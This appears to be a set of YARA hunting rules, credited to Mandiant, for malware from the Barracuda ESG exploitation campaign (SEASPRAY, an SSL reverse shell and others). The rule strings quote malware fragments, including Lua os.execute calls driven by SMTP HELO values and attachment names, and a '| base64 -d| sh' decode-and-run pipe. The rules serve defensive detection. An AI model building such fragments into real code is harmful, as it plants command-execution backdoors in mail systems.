Yara Rule - 헌팅 규칙 바다 샘플에서 관찰 된 문자열을 찾습니다.
Yara 정의.
Yara Rule - Hunting rule looking for strings observed in SEASPRAY samples.
Yara definition.
Author: Mandiant
https://www.mandiant.com/resources/blog/barracuda-esg-exploited-globally
date = "2023-06-15"
score = 70
hash = "cd2813f0260d63ad5adf0446253c2172"
$s1 = "function on_helo()"
$s2 = "local bindex,eindex = string.find(helo,'.onion')"
$s3 = "helosend = 'pd'..' '..helosend"
$s4 = "os.execute(helosend)"
date = "2023-06-15"
score = 70
hash = "177add288b289d43236d2dba33e65956"
$s1 = "error -1 exit" fullword
$s2 = "create socket error: %s(error: %d)\n" fullword
$s3 = "connect error: %s(error: %d)\n" fullword
$s4 = {C7 00 20 32 3E 26 66 C7 40 04 31 00}
$c1 = "plain_connect" fullword
$c2 = "ssl_connect" fullword
$c3 = "SSLShell.c" fullword
uint32(0) == 0x464c457f and filesize < 15MB and (all of ($s*) or all of ($c*))
date = "2023-06-15"
hash = "e4e86c273a2b67a605f5d4686783e0cc"
score = 70
$str1 = "hdr:name() == 'Content-ID'" base64
$str2 = "hdr:body() ~= nil" base64
$str3 = "string.match(hdr:body(),\"^[%w%+/=\\r\\n]+$\")" base64
$str4 = "openssl aes-256-cbc" base64
$str5 = "mod_content.lua"
$str6 = "#!/bin/sh"
date = "2023-06-15"
hash = "87847445f9524671022d70f2a812728f"
score = 70
$str1 = "hdr:name() == 'Content-ID'"
$str2 = "hdr:body() ~= nil"
$str3 = "string.match(hdr:body(),\"^[%w%+/=\\r\\n]+$\")"
$str4 = "openssl aes-256-cbc"
$str5 = "| base64 -d| sh 2>"
date = "2023-06-15"
hash = "35cf6faf442d325961935f660e2ab5a0"
score = 70
$str1 = "string.find(attachment:filename(),'obt075') ~= nil"
$str2 = "os.execute('cp '..tostring(tmpfile)..' /tmp/'..attachment:filename())"
$str3 = "os.execute('rverify'..' /tmp/'..attachment:filename())"```
[https://github.com/Neo23x0/signature-base/commit/60ecfbe9f1bbab86e9222da5729ffac7b2cd7c7c](https://github.com/Neo23x0/signature-base/commit/60ecfbe9f1bbab86e9222da5729ffac7b2cd7c7c)